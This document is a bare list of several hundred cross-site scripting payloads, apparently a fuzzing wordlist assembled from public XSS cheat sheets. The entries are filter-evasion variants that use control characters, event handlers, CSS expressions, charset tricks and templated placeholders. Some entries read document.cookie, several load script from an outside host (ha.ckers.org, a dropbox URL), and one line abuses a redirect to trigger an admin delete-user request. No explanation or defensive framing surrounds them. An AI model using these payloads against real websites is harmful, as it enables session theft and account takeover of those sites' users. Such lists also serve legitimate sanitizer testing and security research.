<a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |||
<a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |||
<a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |||
<a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |||
<a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |||
<a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |||
<a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |||
<a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |||
<a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |||
<a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |||
<a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |||
<a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |||
<a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |||
<a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |||
<a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a> | |||
<a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a> | |||
<a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a> | |||
<a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a> | |||
<a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a> | |||
`"'><img src=xxx:x \x0Aonerror=javascript:alert(1)> | |||
`"'><img src=xxx:x \x22onerror=javascript:alert(1)> | |||
`"'><img src=xxx:x \x0Bonerror=javascript:alert(1)> | |||
`"'><img src=xxx:x \x0Donerror=javascript:alert(1)> | |||
`"'><img src=xxx:x \x2Fonerror=javascript:alert(1)> | |||
`"'><img src=xxx:x \x09onerror=javascript:alert(1)> | |||
`"'><img src=xxx:x \x0Conerror=javascript:alert(1)> | |||
`"'><img src=xxx:x \x00onerror=javascript:alert(1)> | |||
`"'><img src=xxx:x \x27onerror=javascript:alert(1)> | |||
`"'><img src=xxx:x \x20onerror=javascript:alert(1)> | |||
"`'><script>\x3Bjavascript:alert(1)</script> | |||
"`'><script>\x0Djavascript:alert(1)</script> | |||
"`'><script>\xEF\xBB\xBFjavascript:alert(1)</script> | |||
"`'><script>\xE2\x80\x81javascript:alert(1)</script> | |||
"`'><script>\xE2\x80\x84javascript:alert(1)</script> | |||
"`'><script>\xE3\x80\x80javascript:alert(1)</script> | |||
"`'><script>\x09javascript:alert(1)</script> | |||
"`'><script>\xE2\x80\x89javascript:alert(1)</script> | |||
"`'><script>\xE2\x80\x85javascript:alert(1)</script> | |||
"`'><script>\xE2\x80\x88javascript:alert(1)</script> | |||
"`'><script>\x00javascript:alert(1)</script> | |||
"`'><script>\xE2\x80\xA8javascript:alert(1)</script> | |||
"`'><script>\xE2\x80\x8Ajavascript:alert(1)</script> | |||
"`'><script>\xE1\x9A\x80javascript:alert(1)</script> | |||
"`'><script>\x0Cjavascript:alert(1)</script> | |||
"`'><script>\x2Bjavascript:alert(1)</script> | |||
"`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script> | |||
"`'><script>-javascript:alert(1)</script> | |||
"`'><script>\x0Ajavascript:alert(1)</script> | |||
"`'><script>\xE2\x80\xAFjavascript:alert(1)</script> | |||
"`'><script>\x7Ejavascript:alert(1)</script> | |||
"`'><script>\xE2\x80\x87javascript:alert(1)</script> | |||
"`'><script>\xE2\x81\x9Fjavascript:alert(1)</script> | |||
"`'><script>\xE2\x80\xA9javascript:alert(1)</script> | |||
"`'><script>\xC2\x85javascript:alert(1)</script> | |||
"`'><script>\xEF\xBF\xAEjavascript:alert(1)</script> | |||
"`'><script>\xE2\x80\x83javascript:alert(1)</script> | |||
"`'><script>\xE2\x80\x8Bjavascript:alert(1)</script> | |||
"`'><script>\xEF\xBF\xBEjavascript:alert(1)</script> | |||
"`'><script>\xE2\x80\x80javascript:alert(1)</script> | |||
"`'><script>\x21javascript:alert(1)</script> | |||
"`'><script>\xE2\x80\x82javascript:alert(1)</script> | |||
"`'><script>\xE2\x80\x86javascript:alert(1)</script> | |||
"`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script> | |||
"`'><script>\x0Bjavascript:alert(1)</script> | |||
"`'><script>\x20javascript:alert(1)</script> | |||
"`'><script>\xC2\xA0javascript:alert(1)</script> | |||
"/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x /> | |||
"/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x /> | |||
"/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x /> | |||
"/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x /> | |||
"/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x /> | |||
"/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x /> | |||
"/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x /> | |||
"/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x /> | |||
"/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x /> | |||
<script\x2F>javascript:alert(1)</script> | |||
<script\x20>javascript:alert(1)</script> | |||
<script\x0D>javascript:alert(1)</script> | |||
<script\x0A>javascript:alert(1)</script> | |||
<script\x0C>javascript:alert(1)</script> | |||
<script\x00>javascript:alert(1)</script> | |||
<script\x09>javascript:alert(1)</script> | |||
"><img src=x onerror=javascript:alert(1)> | |||
"><img src=x onerror=javascript:alert('1')> | |||
"><img src=x onerror=javascript:alert("1")> | |||
"><img src=x onerror=javascript:alert(`1`)> | |||
"><img src=x onerror=javascript:alert(('1'))> | |||
"><img src=x onerror=javascript:alert(("1"))> | |||
"><img src=x onerror=javascript:alert((`1`))> | |||
"><img src=x onerror=javascript:alert(A)> | |||
"><img src=x onerror=javascript:alert((A))> | |||
"><img src=x onerror=javascript:alert(('A'))> | |||
"><img src=x onerror=javascript:alert('A')> | |||
"><img src=x onerror=javascript:alert(("A"))> | |||
"><img src=x onerror=javascript:alert("A")> | |||
"><img src=x onerror=javascript:alert((`A`))> | |||
"><img src=x onerror=javascript:alert(`A`)> | |||
`"'><img src=xxx:x onerror\x0B=javascript:alert(1)> | |||
`"'><img src=xxx:x onerror\x00=javascript:alert(1)> | |||
`"'><img src=xxx:x onerror\x0C=javascript:alert(1)> | |||
`"'><img src=xxx:x onerror\x0D=javascript:alert(1)> | |||
`"'><img src=xxx:x onerror\x20=javascript:alert(1)> | |||
`"'><img src=xxx:x onerror\x0A=javascript:alert(1)> | |||
`"'><img src=xxx:x onerror\x09=javascript:alert(1)> | |||
<script>javascript:alert(1)<\x00/script> | |||
<img src=# onerror\x3D"javascript:alert(1)" > | |||
<input onfocus=javascript:alert(1) autofocus> | |||
<input onblur=javascript:alert(1) autofocus><input autofocus> | |||
<video poster=javascript:javascript:alert(1)// | |||
<body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus> | |||
<form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X | |||
<video><source onerror="javascript:javascript:alert(1)"> | |||
<video onerror="javascript:javascript:alert(1)"><source> | |||
<form><button formaction="javascript:javascript:alert(1)">X | |||
<body oninput=javascript:alert(1)><input autofocus> | |||
<math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math> | |||
<frameset onload=javascript:alert(1)> | |||
<table background="javascript:javascript:alert(1)"> | |||
<!--<img src="--><img src=x onerror=javascript:alert(1)//"> | |||
<comment><img src="</comment><img src=x onerror=javascript:alert(1))//"> | |||
<![><img src="]><img src=x onerror=javascript:alert(1)//"> | |||
<style><img src="</style><img src=x onerror=javascript:alert(1)//"> | |||
<li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div> | |||
<head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">XXX</a></body> | |||
<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT> | |||
<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT> | |||
<object data="data:text/html;base64,%(base64)s"> | |||
<embed src="data:text/html;base64,%(base64)s"> | |||
<b <script>alert(1)</script>0 | |||
<div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script> | |||
<x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'> | |||
<embed src="javascript:alert(1)"> | |||
<img src="javascript:alert(1)"> | |||
<image src="javascript:alert(1)"> | |||
<script src="javascript:alert(1)"> | |||
<div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x | |||
<? foo="><script>javascript:alert(1)</script>"> | |||
<! foo="><script>javascript:alert(1)</script>"> | |||
</ foo="><script>javascript:alert(1)</script>"> | |||
<? foo="><x foo='?><script>javascript:alert(1)</script>'>"> | |||
<! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>"> | |||
<% foo><x foo="%><script>javascript:alert(1)</script>"> | |||
<div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script> | |||
<img \x00src=x onerror="alert(1)"> | |||
<img \x47src=x onerror="javascript:alert(1)"> | |||
<img \x11src=x onerror="javascript:alert(1)"> | |||
<img \x12src=x onerror="javascript:alert(1)"> | |||
<img\x47src=x onerror="javascript:alert(1)"> | |||
<img\x10src=x onerror="javascript:alert(1)"> | |||
<img\x13src=x onerror="javascript:alert(1)"> | |||
<img\x32src=x onerror="javascript:alert(1)"> | |||
<img\x47src=x onerror="javascript:alert(1)"> | |||
<img\x11src=x onerror="javascript:alert(1)"> | |||
<img \x47src=x onerror="javascript:alert(1)"> | |||
<img \x34src=x onerror="javascript:alert(1)"> | |||
<img \x39src=x onerror="javascript:alert(1)"> | |||
<img \x00src=x onerror="javascript:alert(1)"> | |||
<img src\x09=x onerror="javascript:alert(1)"> | |||
<img src\x10=x onerror="javascript:alert(1)"> | |||
<img src\x13=x onerror="javascript:alert(1)"> | |||
<img src\x32=x onerror="javascript:alert(1)"> | |||
<img src\x12=x onerror="javascript:alert(1)"> | |||
<img src\x11=x onerror="javascript:alert(1)"> | |||
<img src\x00=x onerror="javascript:alert(1)"> | |||
<img src\x47=x onerror="javascript:alert(1)"> | |||
<img src=x\x09onerror="javascript:alert(1)"> | |||
<img src=x\x10onerror="javascript:alert(1)"> | |||
<img src=x\x11onerror="javascript:alert(1)"> | |||
<img src=x\x12onerror="javascript:alert(1)"> | |||
<img src=x\x13onerror="javascript:alert(1)"> | |||
<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)"> | |||
<img src=x onerror=\x09"javascript:alert(1)"> | |||
<img src=x onerror=\x10"javascript:alert(1)"> | |||
<img src=x onerror=\x11"javascript:alert(1)"> | |||
<img src=x onerror=\x12"javascript:alert(1)"> | |||
<img src=x onerror=\x32"javascript:alert(1)"> | |||
<img src=x onerror=\x00"javascript:alert(1)"> | |||
<a href=javascript:javascript:alert(1)>XXX</a> | |||
<img src="x` `<script>javascript:alert(1)</script>"` `> | |||
<img src onerror /" '"= alt=javascript:alert(1)//"> | |||
<title onpropertychange=javascript:alert(1)></title><title title=> | |||
<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>"> | |||
<!--[if]><script>javascript:alert(1)</script --> | |||
<!--[if<img src=x onerror=javascript:alert(1)//]> --> | |||
<script src="/\%(jscript)s"></script> | |||
<script src="\\%(jscript)s"></script> | |||
<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object> | |||
<a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X | |||
<style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style> | |||
<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d | |||
<style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style> | |||
<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">XXX</a></a><a href="javascript:javascript:alert(1)">XXX</a> | |||
<style>*[{}@import'%(css)s?]</style>X | |||
<div style="font-family:'foo ;color:red;';">XXX | |||
<div style="font-family:foo}color=red;">XXX | |||
<// style=x:expression\28javascript:alert(1)\29> | |||
<style>*{x:expression(javascript:alert(1))}</style> | |||
<div style=content:url(%(svg)s)></div> | |||
<div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X | |||
<div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script> | |||
<div style="background:url(/f#oo/;color:red/*/foo.jpg);">X | |||
<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X | |||
<div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style> | |||
<x style="background:url('x;color:red;/*')">XXX</x> | |||
<script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script> | |||
<script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script> | |||
<script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script> | |||
<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script> | |||
<meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi | |||
<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&> | |||
<meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾ | |||
X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` > | |||
1<set/xmlns=`urn:schemas-microsoft-com:time` style=`behAvior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=javascript:alert(1)>`> | |||
1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=javascript:alert(1)>> | |||
<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe> | |||
1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a> | |||
<a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">XXX</a> | |||
<x style="behavior:url(%(sct)s)"> | |||
<xml id="xss" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label> | |||
<event-source src="%(event)s" onload="javascript:alert(1)"> | |||
<a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A"> | |||
<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="<imgsrc=x:xonerror=javascript:alert(1)>"> | |||
<script>%(payload)s</script> | |||
<script src=%(jscript)s></script> | |||
<script language='javascript' src='%(jscript)s'></script> | |||
<script>javascript:alert(1)</script> | |||
<IMG SRC="javascript:javascript:alert(1);"> | |||
<IMG SRC=javascript:javascript:alert(1)> | |||
<IMG SRC=`javascript:javascript:alert(1)`> | |||
<SCRIPT SRC=%(jscript)s?<B> | |||
<FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET> | |||
<BODY ONLOAD=javascript:alert(1)> | |||
<BODY ONLOAD=javascript:javascript:alert(1)> | |||
<IMG SRC="jav ascript:javascript:alert(1);"> | |||
<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)> | |||
<SCRIPT/SRC="%(jscript)s"></SCRIPT> | |||
<<SCRIPT>%(payload)s//<</SCRIPT> | |||
<IMG SRC="javascript:javascript:alert(1)" | |||
<iframe src=%(scriptlet)s < | |||
<INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);"> | |||
<IMG DYNSRC="javascript:javascript:alert(1)"> | |||
<IMG LOWSRC="javascript:javascript:alert(1)"> | |||
<BGSOUND SRC="javascript:javascript:alert(1);"> | |||
<BR SIZE="&{javascript:alert(1)}"> | |||
<LAYER SRC="%(scriptlet)s"></LAYER> | |||
<LINK REL="stylesheet" HREF="javascript:javascript:alert(1);"> | |||
<STYLE>@import'%(css)s';</STYLE> | |||
<META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet"> | |||
<XSS STYLE="behavior: url(%(htc)s);"> | |||
<STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>XSS | |||
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);"> | |||
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);"> | |||
<IFRAME SRC="javascript:javascript:alert(1);"></IFRAME> | |||
<TABLE BACKGROUND="javascript:javascript:alert(1)"> | |||
<TABLE><TD BACKGROUND="javascript:javascript:alert(1)"> | |||
<DIV STYLE="background-image: url(javascript:javascript:alert(1))"> | |||
<DIV STYLE="width:expression(javascript:alert(1));"> | |||
<IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1))"> | |||
<XSS STYLE="xss:expression(javascript:alert(1))"> | |||
<STYLE TYPE="text/javascript">javascript:alert(1);</STYLE> | |||
<STYLE>.XSS{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=XSS></A> | |||
<STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE> | |||
<!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]--> | |||
<BASE HREF="javascript:javascript:alert(1);//"> | |||
<OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT> | |||
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT> | |||
<HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:javascript:alert(1)"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> | |||
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>javascript:alert(1)</SCRIPT>"></BODY></HTML> | |||
<SCRIPT SRC="%(jpg)s"></SCRIPT> | |||
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4- | |||
<form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X | |||
<body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus> | |||
<P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)"> | |||
<STYLE>@import'%(css)s';</STYLE> | |||
<STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE> | |||
<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&> | |||
<SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT> | |||
<style onreadystatechange=javascript:javascript:alert(1);></style> | |||
<?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html> | |||
<embed code=%(scriptlet)s></embed> | |||
<embed code=javascript:javascript:alert(1);></embed> | |||
<embed src=%(jscript)s></embed> | |||
<frameset onload=javascript:javascript:alert(1)></frameset> | |||
<object onerror=javascript:javascript:alert(1)> | |||
<embed type="image" src=%(scriptlet)s></embed> | |||
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(1);">]]</C><X></xml> | |||
<IMG SRC=&{javascript:alert(1);};> | |||
<a href="javAascript:javascript:alert(1)">test1</a> | |||
<a href="javaascript:javascript:alert(1)">test1</a> | |||
<embed width=500 height=500 code="data:text/html,<script>%(payload)s</script>"></embed> | |||
<iframe srcdoc="<iframe/srcdoc=&lt;img/src=&apos;&apos;onerror=javascript:alert(1)&gt;>"> | |||
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; | |||
alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- | |||
></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |||
'';!--"<XSS>=&{()} | |||
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> | |||
<IMG SRC="javascript:alert('XSS');"> | |||
<IMG SRC=javascript:alert('XSS')> | |||
<IMG SRC=JaVaScRiPt:alert('XSS')> | |||
<IMG SRC=javascript:alert("XSS")> | |||
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> | |||
<a onmouseover="alert(document.cookie)">xxs link</a> | |||
<a onmouseover=alert(document.cookie)>xxs link</a> | |||
<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> | |||
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> | |||
<IMG SRC=# onmouseover="alert('xxs')"> | |||
<IMG SRC= onmouseover="alert('xxs')"> | |||
<IMG onmouseover="alert('xxs')"> | |||
<IMG SRC=javascript:alert('XSS')> | |||
<IMG SRC=javascript:alert('XSS')> | |||
<IMG SRC=javascript:alert('XSS')> | |||
<IMG SRC="jav ascript:alert('XSS');"> | |||
<IMG SRC="jav	ascript:alert('XSS');"> | |||
<IMG SRC="jav
ascript:alert('XSS');"> | |||
<IMG SRC="jav
ascript:alert('XSS');"> | |||
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out | |||
<IMG SRC="  javascript:alert('XSS');"> | |||
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |||
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> | |||
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |||
<<SCRIPT>alert("XSS");//<</SCRIPT> | |||
<SCRIPT SRC=http://ha.ckers.org/xss.js?< B > | |||
<SCRIPT SRC=//ha.ckers.org/.j> | |||
<IMG SRC="javascript:alert('XSS')" | |||
<iframe src=http://ha.ckers.org/scriptlet.html < | |||
\";alert('XSS');// | |||
</TITLE><SCRIPT>alert("XSS");</SCRIPT> | |||
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> | |||
<BODY BACKGROUND="javascript:alert('XSS')"> | |||
<IMG DYNSRC="javascript:alert('XSS')"> | |||
<IMG LOWSRC="javascript:alert('XSS')"> | |||
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br> | |||
<IMG SRC='vbscript:msgbox("XSS")'> | |||
<IMG SRC="livescript:[code]"> | |||
<BODY ONLOAD=alert('XSS')> | |||
<BGSOUND SRC="javascript:alert('XSS');"> | |||
<BR SIZE="&{alert('XSS')}"> | |||
<LINK REL="stylesheet" HREF="javascript:alert('XSS');"> | |||
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> | |||
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> | |||
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> | |||
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> | |||
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> | |||
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> | |||
exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'> | |||
<STYLE TYPE="text/javascript">alert('XSS');</STYLE> | |||
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> | |||
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> | |||
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> | |||
<XSS STYLE="xss:expression(alert('XSS'))"> | |||
<XSS STYLE="behavior: url(xss.htc);"> | |||
¼script¾alert(¢XSS¢)¼/script¾ | |||
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> | |||
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> | |||
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> | |||
<IFRAME SRC="javascript:alert('XSS');"></IFRAME> | |||
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> | |||
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> | |||
<TABLE BACKGROUND="javascript:alert('XSS')"> | |||
<TABLE><TD BACKGROUND="javascript:alert('XSS')"> | |||
<DIV STYLE="background-image: url(javascript:alert('XSS'))"> | |||
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> | |||
<DIV STYLE="background-image: url(javascript:alert('XSS'))"> | |||
<DIV STYLE="width: expression(alert('XSS'));"> | |||
<BASE HREF="javascript:alert('XSS');//"> | |||
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> | |||
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> | |||
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> | |||
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"--> | |||
<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?> | |||
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> | |||
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser | |||
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> | |||
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- | |||
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |||
<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |||
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |||
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |||
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |||
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |||
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |||
<A HREF="http://66.102.7.147/">XSS</A> | |||
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A> | |||
<A HREF="http://1113982867/">XSS</A> | |||
<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A> | |||
<A HREF="http://0102.0146.0007.00000223/">XSS</A> | |||
<A HREF="htt p://6 6.000146.0x7.147/">XSS</A> | |||
<iframe src="	javascript:prompt(1)	"> | |||
<svg><style>{font-family:'<iframe/onload=confirm(1)>' | |||
<input/onmouseover="javaSCRIPT:confirm(1)" | |||
<sVg><scRipt >alert(1) {Opera} | |||
<img/src=`` onerror=this.onerror=confirm(1) | |||
<form><isindex formaction="javascript:confirm(1)" | |||
<img src=``
 onerror=alert(1)
 | |||
<script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	></script> | |||
<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=? | |||
<iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> | |||
<script /**/>/**/alert(1)/**/</script /**/ | |||
